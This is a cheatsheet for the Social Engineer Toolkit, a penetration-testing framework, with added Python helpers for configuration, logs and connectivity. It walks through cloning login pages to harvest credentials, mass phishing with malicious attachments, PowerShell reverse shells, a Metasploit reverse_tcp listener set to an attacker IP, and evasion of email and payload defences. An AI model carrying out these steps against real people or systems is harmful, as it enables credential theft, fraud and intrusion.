# Social Engineer Toolkit (SET) Cheatsheet
The Social Engineer Toolkit (SET) is an open-source penetration testing framework designed for social engineering attacks. Developed by David Kennedy (ReL1K) and the TrustedSec team, SET automates a number of social engineering attacks and provides a comprehensive platform for testing human vulnerabilities in security assessments.
## Installation and Setup

### Installation on Kali Linux

```bash
# SET comes pre-installed on Kali Linux
setoolkit

# Update SET
cd /opt/set
git pull
```
### Manual Installation

```bash
# Clone repository
git clone https://github.com/trustedsec/social-engineer-toolkit/ set/
cd set/

# Install dependencies (SET is Python 3 only)
pip3 install -r requirements.txt

# Run setup
python3 setup.py install

# Launch SET
python3 setoolkit
```
### Configuration

```bash
# Edit configuration file
nano /etc/setoolkit/set.config

# Key configuration options:
# WEBATTACK_EMAIL=ON
# APACHE_SERVER=ON
# METASPLOIT_PATH=/usr/share/metasploit-framework
# SENDMAIL=ON
# EMAIL_PROVIDER=GMAIL
```
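A small pre-flight check for the configuration file, added here as an example (it is not part of SET). It assumes set.config is plain `KEY=VALUE` lines with `#` comments, that the three switch keys listed above take only ON or OFF, and that METASPLOIT_PATH must point at an existing directory; the sample text it validates is constructed.

```python
"""Parse and sanity-check a set.config file before launching SET.

Added example, not part of SET. The KEY=VALUE-with-#-comments layout, the
ON/OFF switch list and the directory check on METASPLOIT_PATH are all
assumptions about the file, based only on the options shown above.
"""
import os

# Keys assumed to be simple ON/OFF switches (from the options listed above).
SWITCH_KEYS = {"WEBATTACK_EMAIL", "APACHE_SERVER", "SENDMAIL"}


def load_config(text: str) -> dict:
    """Return {KEY: VALUE} from set.config-style text, skipping comments and blanks."""
    cfg = {}
    for raw in text.splitlines():
        line = raw.split("#", 1)[0].strip()  # drop whole-line and trailing comments
        if not line or "=" not in line:
            continue
        key, value = line.split("=", 1)
        cfg[key.strip()] = value.strip()
    return cfg


def check_config(cfg: dict) -> list:
    """List human-readable problems; an empty list means the config looks sane."""
    problems = []
    for key in sorted(SWITCH_KEYS):
        value = cfg.get(key)
        if value is not None and value.upper() not in ("ON", "OFF"):
            problems.append(f"{key}={value!r}: expected ON or OFF")
    msf = cfg.get("METASPLOIT_PATH")
    if msf and not os.path.isdir(msf):
        problems.append(f"METASPLOIT_PATH={msf!r}: directory does not exist")
    return problems


# Constructed sample: one bad switch value and one Metasploit path that does not exist.
SAMPLE_CONFIG = """\
# Key configuration options
WEBATTACK_EMAIL=ON
APACHE_SERVER=maybe        # typo: should be ON or OFF
METASPLOIT_PATH=/nonexistent/metasploit-placeholder
SENDMAIL=ON
EMAIL_PROVIDER=GMAIL
"""

if __name__ == "__main__":
    path = "/etc/setoolkit/set.config"
    text = open(path).read() if os.path.exists(path) else SAMPLE_CONFIG
    for problem in check_config(load_config(text)) or ["no problems found"]:
        print(problem)
```

Run it as root on the SET host to check the live file; without the file it falls back to the constructed sample and reports the two deliberate faults.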
## Main Menu Options

### 1) Social-Engineering Attacks

```bash
# Launch SET
setoolkit

# Select option 1 from main menu
# Social-Engineering Attacks submenu:
# 1) Spear-Phishing Attack Vectors
# 2) Website Attack Vectors
# 3) Infectious Media Generator
# 4) Create a Payload and Listener
# 5) Mass Mailer Attack
# 6) Arduino-Based Attack Vector
# 7) Wireless Access Point Attack Vector
# 8) QRCode Generator Attack Vector
# 9) Powershell Attack Vectors
# 10) Third Party Modules
```
### Spear-Phishing Attack Vectors

```bash
# Option 1 from Social-Engineering Attacks
# Spear-Phishing submenu:
# 1) Perform a Mass Email Attack
# 2) Create a FileFormat Payload
# 3) Create a Social-Engineering Template

# Mass Email Attack
# - Configure SMTP settings
# - Import email list
# - Create or select email template
# - Attach malicious payload

# FileFormat Payload
# - Select file format (PDF, DOC, XLS, etc.)
# - Choose exploit
# - Generate malicious file

# Email Templates
# - Pre-built templates for common scenarios
# - Custom template creation
# - HTML email support
```
### Website Attack Vectors

```bash
# Option 2 from Social-Engineering Attacks
# Website Attack submenu:
# 1) Java Applet Attack Method
# 2) Metasploit Browser Exploit Method
# 3) Credential Harvester Attack Method
# 4) Tabnabbing Attack Method
# 5) Web Jacking Attack Method
# 6) Multi-Attack Web Method
# 7) HTA Attack Method

# Credential Harvester
# - Clone legitimate websites
# - Capture credentials
# - Redirect after capture
# - Email harvested credentials

# Java Applet Attack
# - Self-signed Java applet
# - Social engineering prompt
# - Payload execution after acceptance

# Browser Exploit Method
# - Metasploit browser exploits
# - Automatic exploitation
# - Multiple exploit attempts
```
## Attack Scenarios

### Credential Harvesting

```bash
# Start SET
setoolkit

# Select: 1) Social-Engineering Attacks
# Select: 2) Website Attack Vectors
# Select: 3) Credential Harvester Attack Method

# Harvester options:
# 1) Web Templates
# 2) Site Cloner
# 3) Custom Import

# Site Cloner example:
# Enter URL to clone: https://gmail.com
# SET will clone the site and host locally
# Captured credentials saved to /root/.set/reports/
```
### Phishing Email Campaign

```bash
# Start SET
setoolkit

# Select: 1) Social-Engineering Attacks
# Select: 1) Spear-Phishing Attack Vectors
# Select: 1) Perform a Mass Email Attack

# Configuration steps:
# 1) Select attack vector (fileformat, etc.)
# 2) Configure payload
# 3) Setup email template
# 4) Configure SMTP settings
# 5) Import target email list
# 6) Send campaign

# Email list format (emails.txt), one address per line:
# user1@company.com
# user2@company.com
# user3@company.com
```
### Infectious Media Generator

```bash
# Start SET
setoolkit

# Select: 1) Social-Engineering Attacks
# Select: 3) Infectious Media Generator

# Media options:
# 1) File-Format Exploits
# 2) Standard Metasploit Executable

# File-Format Exploits:
# - PDF exploits
# - Microsoft Office exploits
# - Browser-based exploits

# Standard Executable:
# - Windows executable
# - Linux executable
# - Mac OSX executable
```
### PowerShell Attack Vectors

```bash
# Start SET
setoolkit

# Select: 1) Social-Engineering Attacks
# Select: 9) Powershell Attack Vectors

# PowerShell options:
# 1) PowerShell Alphanumeric Shellcode Injector
# 2) PowerShell Reverse Shell
# 3) PowerShell Bind Shell
# 4) PowerShell Dump SAM Database

# Reverse Shell example:
# Enter IP address for reverse connection
# Enter port for reverse connection
# Generate PowerShell command
# Execute on target system
```
## Advanced Techniques

### Custom Payloads

```bash
# Create custom payload
setoolkit

# Select: 1) Social-Engineering Attacks
# Select: 4) Create a Payload and Listener

# Payload options:
# 1) Windows Shell Reverse_TCP
# 2) Windows Meterpreter Reverse_TCP
# 3) Windows Meterpreter Reverse_HTTP
# 4) Windows Meterpreter Reverse_HTTPS
# 5) Linux Shell Reverse_TCP

# Configuration:
# Set LHOST (attacker IP)
# Set LPORT (listening port)
# Generate payload
# Setup listener
```
### Multi-Attack Web Method

```bash
# Start SET
setoolkit

# Select: 1) Social-Engineering Attacks
# Select: 2) Website Attack Vectors
# Select: 6) Multi-Attack Web Method

# Combines multiple attack vectors:
# - Java Applet Attack
# - Metasploit Browser Exploit
# - Credential Harvester
# - Tabnabbing
# - Web Jacking

# Increases success probability
# Automatic fallback methods
# Comprehensive attack coverage
```
### Arduino-Based Attacks

```bash
# Start SET
setoolkit

# Select: 1) Social-Engineering Attacks
# Select: 6) Arduino-Based Attack Vector

# Arduino attack types:
# 1) Powershell HTTP GET MSF Payload
# 2) WSCRIPT HTTP GET MSF Payload
# 3) Powershell HTTP POST MSF Payload
# 4) WSCRIPT HTTP POST MSF Payload
# 5) Download-Execute Powershell Attack
# 6) Download-Execute WSCRIPT Attack

# Generates Arduino sketch
# Physical access required
# Automated payload execution
# Bypasses software restrictions
```
## Integration with Metasploit

### Setting up Metasploit Integration

```bash
# Configure Metasploit path in SET
nano /etc/setoolkit/set.config

# Set Metasploit path:
METASPLOIT_PATH=/usr/share/metasploit-framework

# Start Metasploit listener
msfconsole
msf6 > use exploit/multi/handler
msf6 exploit(multi/handler) > set payload windows/meterpreter/reverse_tcp
msf6 exploit(multi/handler) > set LHOST attacker_ip
msf6 exploit(multi/handler) > set LPORT 4444
msf6 exploit(multi/handler) > exploit -j
```
### Automated Listener Setup

```bash
# SET can automatically set up Metasploit listeners
# When creating payloads, SET prompts:
# "Do you want to start the listener now? [y/n]:"
# Answer 'y' for automatic listener setup

# SET will:
# 1) Generate appropriate payload
# 2) Start msfconsole
# 3) Configure handler
# 4) Start listener
```
## Reporting and Logging

### Credential Reports

```bash
# Harvested credentials location
/root/.set/reports/

# View captured credentials (files are named by capture timestamp)
cat "/root/.set/reports/2024-01-01 12:00:00.txt"

# Email reports (if configured)
# Automatic email notifications
# Real-time credential capture alerts
```
### Attack Logs

```bash
# SET log files
/root/.set/logs/

# View attack logs
tail -f /root/.set/logs/set_logfile.log

# Apache access logs (for web attacks)
tail -f /var/log/apache2/access.log

# Email logs
tail -f /var/log/mail.log
```
### Custom Reporting

```bash
# Generate custom reports
# Parse log files for specific information
grep "credential" /root/.set/logs/set_logfile.log

# Extract IP addresses
grep -oE "\b([0-9]{1,3}\.){3}[0-9]{1,3}\b" /root/.set/logs/set_logfile.log

# Count successful attacks
grep -c "successful" /root/.set/logs/set_logfile.log
```
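The three grep commands above, carried into one report script as an added example (not SET's own code). It goes slightly beyond the grep pipeline in two ways: it rejects octets above 255, which the bare regex accepts, and it counts per source address so the report can say how many attempts each client made. The log lines and their timestamp/message layout are constructed, not the real SET log format, and the keywords `credential` and `successful` are taken from the commands above.

```python
"""Summarise a SET log: unique source IPs, credential lines, success lines.

Added example, not part of SET. SAMPLE_LOG is constructed and its layout
is an assumption about the log format; only the keyword matches and the
IPv4 pattern mirror the grep commands shown above.
"""
import re
from collections import Counter

# Same pattern as the grep -oE command; the capture group keeps findall() simple.
IPV4 = re.compile(r"\b((?:[0-9]{1,3}\.){3}[0-9]{1,3})\b")


def valid_ipv4(addr: str) -> bool:
    """Reject matches such as 300.1.1.1 that the bare regex would accept."""
    return all(0 <= int(octet) <= 255 for octet in addr.split("."))


def extract_ips(lines) -> Counter:
    """Return a Counter of valid IPv4 addresses and how often each appears."""
    counts = Counter()
    for line in lines:
        for addr in IPV4.findall(line):
            if valid_ipv4(addr):
                counts[addr] += 1
    return counts


def count_matches(lines, keyword: str) -> int:
    """Case-insensitive line count, like `grep -ci keyword`."""
    needle = keyword.lower()
    return sum(1 for line in lines if needle in line.lower())


def summarise(lines) -> dict:
    """The numbers a test report would quote from the log."""
    ips = extract_ips(lines)
    return {
        "unique_ips": len(ips),
        "top_ips": ips.most_common(3),
        "credential_lines": count_matches(lines, "credential"),
        "successful_lines": count_matches(lines, "successful"),
    }


# Constructed sample log; includes one malformed address to show the octet check.
SAMPLE_LOG = [
    "[2024-01-01 12:00:00] SET started",
    "[2024-01-01 12:00:05] Credential harvester listening, reports in /root/.set/reports/",
    "[2024-01-01 12:01:10] POST from 10.0.0.5 - credential captured",
    "[2024-01-01 12:01:12] redirecting 10.0.0.5 to original site",
    "[2024-01-01 12:02:30] POST from 192.168.1.20 - credential captured",
    "[2024-01-01 12:02:31] malformed client address 300.1.1.1 ignored",
    "[2024-01-01 12:03:00] attack successful: 2 credentials harvested",
]

if __name__ == "__main__":
    import sys
    lines = open(sys.argv[1]).read().splitlines() if len(sys.argv) > 1 else SAMPLE_LOG
    for name, value in summarise(lines).items():
        print(f"{name}: {value}")
```

Pass the real log path as the first argument (`python3 report.py /root/.set/logs/set_logfile.log`); with no argument it runs over the constructed sample.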
## Evasion Techniques

### Email Evasion

```bash
# Domain reputation management
# Use legitimate email providers
# Gradual sending patterns
# Personalized content

# Email headers manipulation
# SPF/DKIM configuration
# Reply-to address spoofing
# Message threading

# Content evasion
# Image-based content
# URL shorteners
# Legitimate file hosting
```
### Web Attack Evasion

```bash
# Domain fronting
# CDN utilization
# SSL/TLS encryption
# Legitimate hosting providers

# User-Agent rotation
# IP address rotation
# Traffic timing variation
# Legitimate referrer headers

# Content delivery
# Staged payloads
# Encrypted communications
# Legitimate file formats
```
### Payload Evasion

```bash
# Encoding techniques
# Encryption methods
# Packing/compression
# Code obfuscation

# Delivery methods
# Legitimate file formats
# Trusted applications
# Signed executables

# Execution techniques
# Living off the land
# PowerShell alternatives
# Memory-only execution
```
## Best Practices

### Legal and Ethical Considerations

```bash
# Always obtain proper authorization
# Document scope and limitations
# Follow responsible disclosure
# Maintain confidentiality

# Create engagement documentation
echo "Social Engineering Test Authorization" > authorization.txt
echo "Client: Company Name" >> authorization.txt
echo "Scope: Email addresses, domains" >> authorization.txt
echo "Date: $(date)" >> authorization.txt
echo "Tester: Your Name" >> authorization.txt
```
### Operational Security

```bash
# Use dedicated infrastructure
# Implement proper logging
# Secure communication channels
# Regular backup procedures

# Infrastructure isolation
# Separate testing networks
# Dedicated email accounts
# Isolated web servers

# Data protection
# Encrypted storage
# Secure transmission
# Proper disposal
```
### Testing Methodology

```bash
# Reconnaissance phase
# Target identification
# Information gathering
# Attack vector selection

# Execution phase
# Payload delivery
# Credential harvesting
# System compromise

# Post-exploitation
# Persistence establishment
# Data collection
# Evidence gathering

# Reporting phase
# Impact assessment
# Remediation recommendations
# Executive summary
```
## Troubleshooting

### Common Issues

```bash
# Email delivery problems
# Check SMTP configuration
# Verify DNS settings
# Test email connectivity

# Web server issues
# Check Apache configuration
# Verify port availability
# Test web connectivity

# Payload generation errors
# Verify Metasploit integration
# Check dependencies
# Update SET framework

# Permission issues
# Run as root user
# Check file permissions
# Verify directory access
```
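Two of the items above, "verify port availability" and "test email/web connectivity", come down to the same socket checks, so here they are as one script. This is an added example, not SET's own diagnostics; the SMTP host and ports in `diagnose()` are placeholders to replace with the engagement's real relay and the port SET's web server is configured to use.

```python
"""Socket-level checks for the 'Common Issues' list: is the web port still
free to bind, and does a TCP handshake with the web server / SMTP relay succeed?

Added example, not part of SET. Hosts and ports passed to diagnose() are
placeholders; swap in the values from your own set.config and SMTP setup.
"""
import socket


def port_is_free(port: int, host: str = "127.0.0.1") -> bool:
    """True if a server on this machine could bind host:port right now.

    False covers both 'already in use' (EADDRINUSE) and 'not permitted'
    (EACCES, e.g. a port below 1024 without root), which is why the
    permission items above sit next to the port check.
    """
    with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as probe:
        try:
            probe.bind((host, port))
        except OSError:
            return False
    return True


def tcp_reachable(host: str, port: int, timeout: float = 3.0) -> bool:
    """True if a TCP handshake with host:port completes within timeout seconds."""
    try:
        with socket.create_connection((host, port), timeout=timeout):
            return True
    except OSError:  # refused, timed out, unresolvable or unreachable
        return False


def diagnose(smtp_host: str = "smtp.example.invalid", smtp_port: int = 587,
             web_port: int = 80) -> dict:
    """Run the checks once and return them by name; True means the check passed.

    web_port_free is True when nothing listens yet (good before SET starts
    Apache, bad afterwards); web_server_reachable is its complement once the
    server is up. smtp_reachable only proves the relay accepts TCP connections,
    not that authentication or sending will work.
    """
    return {
        "web_port_free": port_is_free(web_port),
        "web_server_reachable": tcp_reachable("127.0.0.1", web_port),
        "smtp_reachable": tcp_reachable(smtp_host, smtp_port),
    }


if __name__ == "__main__":
    for check, ok in diagnose().items():
        print(f"{check:>22}: {'ok' if ok else 'FAILED'}")
```

If `web_port_free` and `web_server_reachable` are both False, something other than SET's Apache holds the port and is not answering; `ss -ltnp` on the host identifies the process. A False `smtp_reachable` against the configured relay points at DNS or firewall issues rather than at SET's SMTP settings.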
### Configuration Fixes

```bash
# Reset SET configuration
rm /etc/setoolkit/set.config
setoolkit  # will recreate the default config on first start

# Update SET framework
cd /opt/set
git pull
python3 setup.py install

# Fix Apache issues
sudo systemctl restart apache2
sudo systemctl enable apache2

# Fix email issues
sudo systemctl restart postfix
sudo systemctl enable postfix
```